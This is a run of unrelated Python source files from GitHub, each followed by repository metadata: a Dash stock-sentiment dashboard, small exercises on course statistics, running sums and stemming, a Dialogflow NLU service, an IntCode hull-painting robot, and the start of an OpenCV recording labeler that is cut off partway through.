top_mentions_hastags_sunburstfig = px.sunburst(top_social_media, path=['keytype', 'Source', 'index'],
values='count',color_discrete_sequence=px.colors.qualitative.Pastel)
top_mentions_hastags_sunburstfig.update_layout(
plot_bgcolor='#5B5959',
title=dict(text="<b>Top Mentions/Hashtags on Social Media</b>"),
font=dict(size=11)
)
return top_mentions_hastags_sunburstfig
@app.callback(
Output('stocksentimentlinechart', 'figure')
,
Input('dropdown', 'value')
)
def update_graphs(value):
#####
tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1')
reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweet_df[tweet_df['ticker'] == '$'+ value]
reddit_df = reddit_df[reddit_df['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df])
twitter_reddit_sentiment_df['datehour'] = pd.to_datetime(
twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H"))
twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y"))
finaldf = twitter_reddit_sentiment_df.groupby(['datehour', 'DataSource'])['sentiment_score'].mean().reset_index()
stock_sentiment_line_fig = update_sentiment_linechart(finaldf, x='datehour', y='sentiment_score',
color='DataSource')
return stock_sentiment_line_fig
@app.callback([
Output('stocksentimentfunnelallchart', 'figure'),
Output('stocksentimentfunnelchart', 'figure')
],
Input('dropdown', 'value')
)
def update_graphs(value):
#####
tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1')
reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweet_df[tweet_df['ticker'] == '$'+value]
reddit_df = reddit_df[reddit_df['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df])
twitter_reddit_sentiment_df['datehour'] = pd.to_datetime(
twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H"))
twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y"))
finaldf_date = twitter_reddit_sentiment_df.groupby(['Date', 'DataSource', 'sentiment']).size().reset_index()
final__ = finaldf_date.sort_values(0, ascending=False)
stock_sentiment_funnel_all_fig = px.bar(final__, x=0, y='sentiment', color="DataSource")
#stock_sentiment_funnel_all_fig.update_layout(showlegend=False)
finaldf_ = twitter_reddit_sentiment_df.groupby(['datehour', 'DataSource', 'sentiment']).size().reset_index()
finaldf_2 = finaldf_[finaldf_['sentiment'] != "Neutral"]
stock_sentiment_funnel_fig = update_stock_sentiment_funnel(finaldf_2, x="datehour", y=0, text="DataSource",
color="sentiment")
return stock_sentiment_funnel_all_fig,stock_sentiment_funnel_fig
@app.callback([
Output('sentimenttable', 'children'),
Output('redditwordcloudplot', 'figure'),
Output('twitterwordcloudplot', 'figure')
],
Input('dropdown', 'value')
)
def update_graphs(value):
tweetdf = get_data_from_db( db_table_name = 'socialmediadata.ticker_twitterdata1')
redditdf = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweetdf[tweetdf['ticker'] == '$'+value]
reddit_df = redditdf[redditdf['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df])
nlpinsight = nlpinsights(reddit_df, column_name="text")
reddit_wordcloud_fig = nlpinsight.visualize_wordclouds()
nlpinsight = nlpinsights(tweet_df, column_name="text")
twitter_wordcloud_fig = nlpinsight.visualize_wordclouds()
twitter_reddit_sentiment_df['datehour'] = pd.to_datetime(
twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H"))
twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y"))
print(twitter_reddit_sentiment_df.columns)
twitter_reddit_sentiment_fil = twitter_reddit_sentiment_df[['date_hour', 'text', 'sentiment_score','DataSource','url']]
twitter_reddit_sentiment_fil = twitter_reddit_sentiment_fil.round(3)
def f(row):
l = "[{0}]({0})".format(row["url"])
return l
print(twitter_reddit_sentiment_fil.head(2))
twitter_reddit_sentiment_fil["url"] = twitter_reddit_sentiment_fil.apply(f, axis=1)
#twitter_reddit_sentiment_fil = twitter_reddit_sentiment_fil[
# (twitter_reddit_sentiment_fil['sentiment_score'] > int(slidervalue[0])) & (
# twitter_reddit_sentiment_fil['sentiment_score'] < int(slidervalue[1]))]
sentiments_table = dash_table.DataTable(
id='datatable-output1',
style_data={
'whiteSpace': 'normal',
# 'height': 'auto'
},
data=twitter_reddit_sentiment_fil.to_dict('records'),
row_selectable="multi",
selected_rows=[],
columns=[{'id': c, 'name': c ,'type':'text', 'presentation':'markdown'} for c in twitter_reddit_sentiment_fil.columns],
# columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}],
filter_action='native',
sort_action='native',
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
page_size=4,
style_header={'backgroundColor': '#7DF180', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'},
# export_format='csv',
export_format='csv',
style_cell_conditional=[
{'if': {'column_id': 'date_hour'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment_score'},
'width': '5%',
'textAlign': 'left'},
{'if': {'column_id': 'text'},
'width': '65%',
'textAlign': 'left'},
{'if': {'column_id': 'DataSource'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'url'},
'width': '10%',
'textAlign': 'left'}
]
)
#top_mentions_hastags_sunburstfig
return sentiments_table,reddit_wordcloud_fig,twitter_wordcloud_fig
@app.callback(
Output('newsngramfig', 'figure'),
Output('newswordcloudfig', 'figure'),
Input('dropdown', 'value')
)
def update_graphs(value):
news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata')
news_df = news_df[news_df['ticker'] == value]
news_df = news_df.round(3)
news_df = news_df.head(15)
nlpinsight = nlpinsights(news_df, column_name="text")
news_wordcloud_fig = nlpinsight.visualize_wordclouds()
news_ngram_fig = nlpinsight.visualize_ngrams(2,5)
return news_ngram_fig,news_wordcloud_fig
@app.callback(
Output('newsnamedentity', 'figure'),
Input('dropdown', 'value')
)
def update_graphs(value):
news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata')
news_df = news_df[news_df['ticker'] == value]
news_df = news_df.round(3)
news_df = news_df.head(5)
nlpinsight = nlpinsights(news_df, column_name="text")
news_namedentity_fig = nlpinsight.visualize_namedentities()
return news_namedentity_fig
@app.callback(Output('newsarticletable', 'children'),
Input('dropdown', 'value')
)
def update_graphs(value):
news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata')
news_df = news_df[news_df['ticker'] == value]
news_df = news_df.round(3)
#newsarticle_df = news_df[news_df['ticker'] == value]
newsarticle_df = news_df[['date','title','summary','sentiment_score','link']]
newsarticle_df = newsarticle_df[newsarticle_df['summary']!='Invalid']
#print(newsarticle_df)
def f(row):
l = "[{0}]({0})".format(row["link"])
return l
newsarticle_df["link"] = newsarticle_df.apply(f, axis=1)
newsarticle_table = dash_table.DataTable(
id='datatable-output1',
style_data={
'whiteSpace': 'normal',
# 'height': 'auto'
},
data=newsarticle_df.to_dict('records'),
row_selectable="multi",
selected_rows=[],
columns=[{'id': c, 'name': c ,'type':'text', 'presentation':'markdown'} for c in newsarticle_df.columns],
# columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}],
filter_action='native',
sort_action='native',
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
page_size=4,
style_header={'backgroundColor': '#7DF180', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'},
# export_format='csv',
export_format='csv',
style_cell_conditional=[
{'if': {'column_id': 'Date'},
'width': '15%',
'textAlign': 'left'},
{'if': {'column_id': 'Title'},
'width': '20%',
'textAlign': 'left'},
{'if': {'column_id': 'Link'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'summary'},
'width': '45%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment_score'},
'width': '10%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment'},
'width': '5%',
'textAlign': 'left'}
]
)
return newsarticle_table
@app.callback(Output('tweettable', 'children'),
[Input('twitter_search', 'value'),
Input('interval-component', 'n_intervals')]
)
def update_graphs(value,n):
mainlis = []
res = api.search(value)
for i in res:
lis = []
lis.append([i.id, i.created_at, i.text])
mainlis.append(lis)
tweetstream_df = pd.DataFrame(mainlis)
tweetstream_table = dash_table.DataTable(
id='datatable-output',
style_data={
'whiteSpace': 'normal',
'height': 'auto',
'lineHeight': '15px'
},
data=tweetstream_df.to_dict('records'),
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
columns=[{'id': c, 'name': c} for c in tweetstream_df.columns],
page_size=8,
style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'font_family': "Arial", 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'
},
# export_format='csv',
export_format='csv',
export_headers='display',
style_data_conditional=[
{
'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
}
],
style_cell_conditional=[
{'if': {'column_id': 'UserTweetDate'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Time'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Tweet'},
'width': '55%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment'},
'width': '15%',
'textAlign': 'left'},
]
)
return tweetstream_table
@app.callback(Output('semanticsearchtable', 'children')
,
Input('semantic_search', 'value')
)
def update_graphs(value):
stock_socialmediasemanticdata = get_data_from_db(db_table_name='socialmediadata.stock_socialmediasemanticdata')
semantic_df = get_similar_sentences(stock_socialmediasemanticdata,[value])
def f(row):
l = "[{0}]({0})".format(row["link"])
return l
semantic_df["link"] = semantic_df.apply(f, axis=1)
print("Semantic Searchhh")
print(semantic_df.head())
tweetstream_table = dash_table.DataTable(
id='datatable-output1',
style_data={
'whiteSpace': 'normal',
# 'height': 'auto'
},
data=semantic_df.to_dict('records'),
columns=[{'id': c, 'name': c, 'type': 'text', 'presentation': 'markdown'} for c in semantic_df.columns],
# columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}],
#filter_action='native',
sort_action='native',
css=[
{'selector': '.row-1', 'rule': 'background: #E6A000;'}
],
page_size=4,
style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'},
# export_format='csv',
export_format='csv'
)
return tweetstream_table
@app.callback(Output('stocktwits-output', 'children'),
[Input('dropdown', 'value')])
def get_data_table2(option):
df2 = getstocktwitsdata(option)
#print('---STOCKTWITS---')
#print(df2)
df = df2[['date','time','text','sentiment']]
df.columns = ['UserTweetDate', 'Time', 'Tweet', 'sentiment']
filtereddf = df.copy()
filteredtable = dash_table.DataTable(
id='datatable-output',
style_data={
'whiteSpace': 'normal',
'height': 'auto',
'lineHeight': '15px'
},
data=filtereddf.to_dict('records'),
css=[
{ 'selector': '.row-1', 'rule': 'background: #E6A000;' }
],
columns=[{'id': c, 'name': c} for c in filtereddf.columns],
page_size=8,
style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black',
'font_size': '18px'},
style_cell={'font_size': '11px', 'font_family':"Arial",'whiteSpace': 'normal',
'height': 'auto', 'padding': '15px'
},
#export_format='csv',
export_format='csv',
export_headers='display',
style_data_conditional=[
{
'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
}
],
style_cell_conditional=[
{'if': {'column_id': 'UserTweetDate'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Time'},
'width': '10%',
'textAlign': 'center'},
{'if': {'column_id': 'Tweet'},
'width': '55%',
'textAlign': 'left'},
{'if': {'column_id': 'sentiment'},
'width': '15%',
'textAlign': 'left'},
]
)
return filteredtable
@app.callback(
    Output('main_div', 'children'),
    [Input('tabs-styled-with-inline', 'value')])
def update_graph(tab_btn):
    """Swap the main page body when the active tab changes."""
    bodies = {
        "home": HOME_BODY,
        "socialmedia": SOCIALMEDIA_BODY,
        "news": NEWS_BODY,
    }
    # Unknown tab values yield None, matching the original's implicit return.
    return bodies.get(tab_btn)
if __name__ == "__main__":
    # Start the Dash development server on port 8053.
    app.run_server(port = 8053)
|
balasubramaniamniit/StockMarket-Insights
|
app.py
|
app.py
|
py
| 30,384 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26345492918
|
class Technology:
    """One programming language with per-course participant counts.

    `course` maps course name -> participants; `total_participants` is the
    running sum across all courses.
    """

    def __init__(self, language, course_name, participants):
        self.language = language
        self.course_name = course_name
        self.participants = participants
        count = int(participants)
        self.course = {course_name: count}
        self.total_participants = count

    def add_course(self, course_name, participants):
        """Register a new course, or add participants to an existing one."""
        count = int(participants)
        if course_name in self.course:
            self.course[course_name] += count
        else:
            self.course[course_name] = count
        self.total_participants += count

    def __str__(self):
        return f"language - {self.language} / total_participants - {self.total_participants} / course - {self.course}"
# Read lines like "Language - course1:count1, course2:count2" until 'end',
# aggregate per-language/per-course participant totals, then print a report
# sorted by total participants (descending).
data = input()
objects = []
while data != 'end':
    data = data.split(' - ')
    language = data[0]
    courses = data[1]
    courses = courses.split(", ")
    for item in courses:
        course_name = item.split(":")[0]
        participants = item.split(":")[1]
        # First time this language is seen: create a Technology object;
        # otherwise merge the course into the existing one.
        if language not in [x.language for x in objects]:
            obj = Technology(language, course_name, participants)
            objects.append(obj)
        else:
            for i in objects:
                if i.language == language:
                    i.add_course(course_name, participants)
    data = input()
# Sort languages by total participants, most popular first.
tech_sort = sorted(objects, key=lambda x: -x.total_participants)
print(f"Most popular: {tech_sort[0].language} ({tech_sort[0].total_participants} participants)")
print(f"Least popular: {tech_sort[-1].language} ({tech_sort[-1].total_participants} participants)")
for index, elem in enumerate(tech_sort):
    print(f"{tech_sort[index].language} \
({tech_sort[index].total_participants} participants):")
    # Within a language, list courses by participant count, descending.
    course_sort = sorted(elem.course.items(), key=lambda x: -x[1])
    for item in course_sort:
        print(f"--{item[0]} -> {item[1]}")
|
YovchoGandjurov/Python-Fundamentals
|
Exam Preparation/04.Course_Stats.py
|
04.Course_Stats.py
|
py
| 1,962 |
python
|
en
|
code
| 1 |
github-code
|
6
|
39176120423
|
# Sample inputs for the demo call below.
array = [1,2,3,4]
array2 = [1,1,1,1,1]


def runningSum(array):
    """Return the running (prefix) sums of *array*.

    runningSum([1, 2, 3, 4]) -> [1, 3, 6, 10]; an empty input yields [].
    """
    # Named `total` instead of the original `sum`, which shadowed the builtin.
    total = 0
    prefix = []
    for value in array:
        total += value
        prefix.append(total)
    return prefix


print(runningSum(array2))
|
adnantabda/Competitive-Programming
|
easy/running_sum_of_1D_array.py
|
running_sum_of_1D_array.py
|
py
| 238 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6428337601
|
#! /user/bin/env python
# -*- coding:utf-8 -*-
from python_http_runner.src.common.utils import get_data_from_yml
from python_http_runner.src.common.utils import get_url
def common_get(*args):
    """Look up a shared config value by key (args[0]).

    env/key1/key2 come from ../common/config.yml; url comes from get_url().
    Unknown keys return "" (empty string), as before.
    """
    content = get_data_from_yml("../common/config.yml")
    data = {
        "env": content["env"],
        "key1": content["key1"],
        "key2": content["key2"],
        "url": get_url(),
    }
    # dict.get replaces the original build-then-overwrite placeholder dict
    # and the `in data.keys()` membership test; behavior is identical.
    return data.get(str(args[0]), "")
def feature1_get(*args):
    """Return the feature-1 mapping for args[0], or '' when absent."""
    lookup = {
        "key1": "key1",
        "key2": "key2",
    }
    return lookup.get(str(args[0]), "")
def feature2_get(*args):
    """Return the feature-2 mapping for args[0], or '' when absent."""
    lookup = {
        "key1": "key1",
        "key2": "key2",
    }
    return lookup.get(str(args[0]), "")
|
liuxu263/PythonHttpRunner
|
python_http_runner/src/testsuites/debugtalk.py
|
debugtalk.py
|
py
| 1,019 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16731268894
|
from abc import ABC, ABCMeta, abstractmethod
from datetime import datetime
from pprint import pprint
from typing import Dict
try:
from dialogflow_v2 import SessionsClient
from dialogflow_v2.proto.session_pb2 import (
DetectIntentResponse,
QueryInput,
QueryResult,
TextInput,
)
except:
SessionsClient = None
DetectIntentResponse = None
QueryInput = None
QueryResult = None
TextInput = None
from haps import SINGLETON_SCOPE, base, egg, scope
from haps.config import Config
from botkit.builtin_services.nlu.dialogflowconfig import DialogflowConfig
from botkit.builtin_services.nlu.messageunderstanding import MessageUnderstanding
@scope(SINGLETON_SCOPE)
@base
class INLUService(ABC):
    """haps base interface for natural-language-understanding backends."""
    @abstractmethod
    def detect_intents(self, chat_id: int, message: str, language_code: str = None):
        """Run NLU on `message` for the given chat session and return the result."""
        pass
@egg
class DialogflowService(INLUService):
    """INLUService implementation backed by the Dialogflow v2 API."""
    # Resolved through haps' Config using the key declared on DialogflowConfig.
    config: DialogflowConfig = Config(DialogflowConfig.KEY)
    def __init__(self):
        # Authenticate with the service-account JSON named in the config.
        self.session_client = SessionsClient.from_service_account_file(
            self.config.json_credentials_file
        )
    def detect_intents(
        self, chat_id: int, message: str, language_code: str = "en"
    ) -> MessageUnderstanding:
        """Send `message` to Dialogflow (one session per chat_id) and map the
        query result onto a MessageUnderstanding."""
        # NOTE(review): the usual dialogflow_v2 API is session_path, not
        # session_file — confirm this method exists in the pinned version.
        session = self.session_client.session_file(self.config.project_id, chat_id)
        text_input = TextInput(text=message, language_code=language_code)
        query_input = QueryInput(text=text_input)
        response: DetectIntentResponse = self.session_client.detect_intent(
            session=session, query_input=query_input
        )
        result: QueryResult = response.query_result
        # Ignored result fields:
        # - all_required_params_present
        # - fulfillment_text
        # - fulfillment_messages
        # - webhook_source
        # - webhook_payload
        # - output_contexts
        # - diagnostic_info
        return MessageUnderstanding(
            text=result.query_text,
            language_code=result.language_code,
            action=result.action,
            intent=result.intent.display_name,
            parameters=self._normalize_parameters(result.parameters),
            contexts=result.output_contexts,
            confidence=result.speech_recognition_confidence or result.intent_detection_confidence,
            date=datetime.now(),
        )
    def _normalize_parameters(self, params: Dict):
        """Convert Dialogflow date parameters to datetimes; pass everything else through."""
        # NOTE(review): `dateutil` is used below but never imported in this
        # module, so any date parameter raises NameError. Add
        # `import dateutil.parser` (python-dateutil) to fix.
        result = {}
        for k, v in params.items():
            if "date" in k and v:
                # Dialogflow may nest the ISO timestamp under "date_time".
                if hasattr(v, "keys") and "date_time" in v:
                    accessor = v["date_time"]
                else:
                    accessor = v
                print(accessor)
                time_and_date: datetime = dateutil.parser.parse(accessor)
                result[k] = time_and_date
                continue
            result[k] = v
        return result
if __name__ == "__main__":
    # Ad-hoc manual test against a live Dialogflow project.
    conf = DialogflowConfig(
        project_id="userbot-9994a",
        json_credentials_file="C:/projects/userbot/dialogflow-credentials.json",
    )
    # NOTE(review): DialogflowService.__init__ takes no arguments, so this
    # call raises TypeError — likely stale code predating the haps Config
    # injection above. Confirm and fix.
    c = DialogflowService(conf)
    nlu = c.detect_intents(123, "!remind @tWiTfAcE to buy milk tomorrow at 6", "en")
    # print(nlu)
    pprint(nlu)
|
autogram/Botkit
|
botkit/builtin_services/nlu/nluservice.py
|
nluservice.py
|
py
| 3,231 |
python
|
en
|
code
| 10 |
github-code
|
6
|
30544609936
|
# stemming
# e.g. stemming will convert ["python","pythoner","pythoning","pythoned","pythonly"] to python
# e.g. stemming will convert ["interesting","interested"] to interest
# stemming may create some words that do not exits
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
# One stemmer instance is reused for both demos below.
ps = PorterStemmer()
example_words = ["python","pythoner","pythoning","pythoned","pythonly"]
# Each of these reduces to the common stem "python".
for w in example_words:
    print(ps.stem(w))
new_text = ("It is very import to be pythonly while you are pythoning with python. "
    "All pythoners have have pythoned poorly at least once.")
# Stem every token of the sentence.
# NOTE(review): word_tokenize needs the NLTK 'punkt' data to be downloaded.
words = word_tokenize(new_text)
for w in words:
    print(ps.stem(w))
|
limingwu8/ML
|
NLP/demo03.py
|
demo03.py
|
py
| 669 |
python
|
en
|
code
| 1 |
github-code
|
6
|
71885865788
|
#! /usr/bin/env python
import sys
from collections import defaultdict
from intcode import IntCode
# Read the puzzle input from stdin (the IntCode program is on the first line).
lines = []
for line in sys.stdin:
    lines.append(line.rstrip('\n'))
class Robot():
    """Hull-painting robot driven by an IntCode brain (AoC 2019, day 11)."""

    program = None
    direction = (0, 1)   # unit vector; starts facing "up"
    position = (0, 0)
    panels = None        # (x, y) -> colour; unvisited panels default to 0 (black)

    def __init__(self, line) -> None:
        self.program = IntCode(line.split(','), inputs=[])
        self.panels = defaultdict(int)

    def move(self, val):
        """Rotate 90° (right when val == 1, left otherwise), then step forward."""
        dx, dy = self.direction
        self.direction = (dy, -dx) if val == 1 else (-dy, dx)
        px, py = self.position
        self.position = (px + self.direction[0], py + self.direction[1])

    def run(self):
        """Feed the current panel colour to the program until it halts; each
        output pair paints the panel and turns/moves the robot."""
        while not self.program.finished:
            self.program.inputs.append(self.panels[self.position])
            self.program.run()
            if self.program.finished:
                continue
            colour, turn = self.program.outputs
            self.program.outputs.clear()
            self.panels[self.position] = colour
            self.move(turn)
# Part 1
print("-- Part 1 --")
robot = Robot(lines[0])
robot.run()
# Answer: number of distinct panels the robot touched at least once.
dim = len(robot.panels.keys())
print(dim)
# Part 2
print("-- Part 2 --")
robot = Robot(lines[0])
robot.panels[0,0] = 1 # we start on a white panel instead
robot.run()
# Compute the bounding box of all visited panels so the painted
# registration identifier can be rendered.
min_x, min_y, max_x, max_y = dim,dim,-dim,-dim
for (x,y) in robot.panels.keys():
    min_x = min(x,min_x)
    max_x = max(x,max_x)
    min_y = min(y,min_y)
    max_y = max(y,max_y)
# Render top-to-bottom (decreasing y); '@' marks white panels.
for y in reversed(range(min_y, max_y+1)):
    print(''.join( '@' if robot.panels[x,y]==1 else ' ' for x in range(min_x, max_x+1)))
|
albatros69/aoc-2019
|
day-11/paint.py
|
paint.py
|
py
| 1,580 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19167010026
|
#!/usr/bin/env python3
"""OpenCV-based frame viewer that replays recordings and assign time-based labels"""
import argparse
from pathlib import Path
import time
import cv2
import numpy as np
import derp.util
class Labeler:
    """OpenCV-based frame viewer that replays recordings and assign time-based labels"""
    def __init__(self, folder, scale=1, bhh=40):
        """Load the topics and existing labels from the folder, scaling up the frame

        folder: recording directory holding the topic files and config.yaml
        scale: display magnification applied to each camera frame
        bhh: half-height (px) of the speed/steer plot strip under the frame
        """
        self.folder = folder
        self.scale = scale
        self.bhh = bhh
        self.config_changed = False
        self.quality = None  # label currently being "painted" while seeking
        self.config_path = self.folder / "config.yaml"
        self.window_name = "Labeler %s" % self.folder
        self.config = derp.util.load_config(self.config_path)
        # BGR colors for the junk/risk/good quality values, indexed by enum.
        self.quality_colors = [(0, 0, 255), (0, 128, 255), (0, 255, 0)]
        self.topics = derp.util.load_topics(folder)
        self.frame_id = 0
        self.n_frames = len(self.topics["camera"])
        self.seek(self.frame_id)
        self.f_h = self.frame.shape[0]
        self.f_w = self.frame.shape[1]
        self.l_h = int(self.bhh // 5)  # height of the label/autonomy bar
        # Window layout: frame on top, label bar, then the two plot strips.
        self.window = np.zeros(
            [self.f_h + self.bhh * 2 + self.l_h + 2, self.f_w, 3], dtype=np.uint8
        )
        self.paused = True
        self.show = False
        # Prepare labels
        self.autonomous_bar = np.ones((self.f_w, 3), dtype=np.uint8) * (255, 255, 255)
        self.quality_bar = np.ones((self.f_w, 3), dtype=np.uint8) * (128, 128, 128)
        # Reuse existing quality labels when present, otherwise start as junk.
        if "quality" in self.topics and len(self.topics["quality"]) >= self.n_frames:
            self.qualities = [str(msg.quality) for msg in self.topics["quality"]]
        else:
            self.qualities = ["junk" for _ in range(self.n_frames)]
        for i, quality in enumerate(self.qualities):
            self.update_quality(i, i, quality)
        # Prepare state messages
        self.camera_times = [msg.publishNS for msg in self.topics["camera"]]
        # Latch the most recent autonomy flag onto each camera frame.
        self.camera_autos = []
        auto = False
        for timestamp, topic, msg in derp.util.replay(self.topics):
            if topic == 'controller':
                auto = msg.isAutonomous
            elif topic == 'camera':
                self.camera_autos.append(auto)
        actions = derp.util.extract_car_actions(self.topics)
        self.camera_speeds = derp.util.extract_latest(self.camera_times,
                                                      actions[:, 0], actions[:, 1])
        self.camera_steers = derp.util.extract_latest(self.camera_times,
                                                      actions[:, 0], actions[:, 2])
        # Resample speed/steer to one value per window column for plotting.
        # NOTE(review): np.int is removed in NumPy >= 1.24 — use int instead.
        window_Xs = np.linspace(self.camera_times[0], self.camera_times[-1], self.f_w)
        self.window_speeds = np.array(np.interp(window_Xs, self.camera_times, self.camera_speeds)
                                      * -self.bhh, dtype=np.int)
        self.window_steers = np.array(np.interp(window_Xs, self.camera_times, self.camera_steers)
                                      * -self.bhh, dtype=np.int)
        self.autonomous_bar *= np.array(np.interp(window_Xs, self.camera_times,
                                                  self.camera_autos), dtype=np.uint8)[:, None]
        # Clamp steering to the plot strip's half-height.
        self.window_steers[self.window_steers > self.bhh] = self.bhh
        self.window_steers[self.window_steers < -self.bhh] = -self.bhh
        cv2.namedWindow(self.window_name)
        cv2.setMouseCallback(self.window_name, self.click_handler)
        # Print some statistics
        duration = (self.camera_times[-1] - self.camera_times[0]) / 1e9
        fps = (len(self.camera_times) - 1) / duration
        print("Duration of %.0f seconds at %.0f fps" % (duration, fps))
    def __del__(self):
        """Deconstructor to close window"""
        cv2.destroyAllWindows()
    def click_handler(self, event, x, y, flags, param):
        """ Handle clicks on the window """
        if event == cv2.EVENT_LBUTTONDOWN:
            # Clicking below the frame seeks to the corresponding timestamp.
            if y > self.f_h:
                frame_id = int((x / self.f_w) * self.n_frames)
                self.seek(frame_id)
                self.show = True
    def update_quality(self, first_index, last_index, quality=None):
        """Update the label bar to the given quality"""
        if quality is None:
            return False
        first_index, last_index = min(first_index, last_index), max(first_index, last_index)
        for index in range(first_index, last_index + 1):
            self.qualities[index] = quality
        beg_pos = self.frame_pos(first_index)
        end_pos = self.frame_pos(last_index + (self.n_frames < len(self.quality_bar)))
        self.quality_bar[beg_pos : end_pos + 1] = self.bar_color(quality)
        return True
    def seek(self, frame_id=None):
        """Update the current frame to the given frame_id, otherwise advances by 1 frame"""
        if frame_id is None:
            frame_id = self.frame_id + 1
        if frame_id < 0:
            frame_id = 0
            self.paused = True
        if frame_id >= self.n_frames:
            frame_id = self.n_frames - 1
            self.paused = True
        # Paint the active quality label over every frame skipped past.
        self.update_quality(self.frame_id, frame_id, self.quality)
        self.frame = cv2.resize(
            derp.util.decode_jpg(self.topics["camera"][frame_id].jpg),
            None,
            fx=self.scale,
            fy=self.scale,
            interpolation=cv2.INTER_AREA,
        )
        self.frame_id = frame_id
        return True
    def bar_color(self, quality):
        """Figure out the color for the given quality"""
        if quality is None:
            return (128, 128, 128)
        return self.quality_colors[derp.util.TOPICS["quality"].QualityEnum.__dict__[quality]]
    def display(self):
        """Blit all the status on the screen"""
        self.window[: self.frame.shape[0], :, :] = self.frame
        horizon_percent = self.config["camera"]["pitch"] / self.config["camera"]["vfov"] + 0.5
        # Horizon line
        self.window[int(self.f_h * horizon_percent), :, :] = (255, 0, 255)
        # Clear status buffer
        self.window[self.f_h :, :, :] = 0
        # Draw label bar
        self.window[self.f_h : self.f_h + self.l_h // 2, :, :] = self.autonomous_bar
        self.window[self.f_h + self.l_h // 2 : self.f_h + self.l_h, :, :] = self.quality_bar
        # Draw current timestamp vertical line
        current_x = self.frame_pos(self.frame_id)
        self.window[self.f_h + self.l_h :, current_x, :] = self.bar_color(self.quality)
        # Draw zero line
        self.window[self.f_h + self.l_h + self.bhh, :, :] = (96, 96, 96)
        # Plot the speed (pink) and steering (yellow) traces.
        offset = self.f_h + self.bhh + self.l_h
        self.window[self.window_speeds + offset, np.arange(self.f_w), :] = (255, 64, 255)
        self.window[self.window_steers + offset, np.arange(self.f_w), :] = (64, 255, 255)
        text = "%05i %07.3f %06.3f %06.3f" % (self.frame_id,
                                              (self.camera_times[self.frame_id] / 1E9) % 100,
                                              self.camera_steers[self.frame_id],
                                              self.camera_speeds[self.frame_id])
        font = cv2.FONT_HERSHEY_SIMPLEX
        pink = (255, 128, 255)
        offset = (0, int(self.scale * 30))
        cv2.putText(self.window, text, offset, font, self.scale, pink, 1, cv2.LINE_AA)
        cv2.imshow(self.window_name, self.window)
    def save_labels(self):
        """Write all of our labels to the folder as messages"""
        with derp.util.topic_file_writer(self.folder, "quality") as quality_fd:
            for quality_i, quality in enumerate(self.qualities):
                # publish just before the matching camera frame so a replay
                # orders the quality message ahead of it — TODO confirm.
                msg = derp.util.TOPICS["quality"].new_message(
                    createNS=derp.util.get_timestamp(),
                    publishNS=self.topics["camera"][quality_i].publishNS - 1,
                    writeNS=derp.util.get_timestamp(),
                    quality=quality,
                )
                msg.write(quality_fd)
        print("Saved quality labels in", self.folder)
        if self.config_changed:
            derp.util.dump_config(self.config, self.config_path)
            print("Saved changes to config")
    def handle_keyboard_input(self):
        """Fetch a new keyboard input if one exists"""
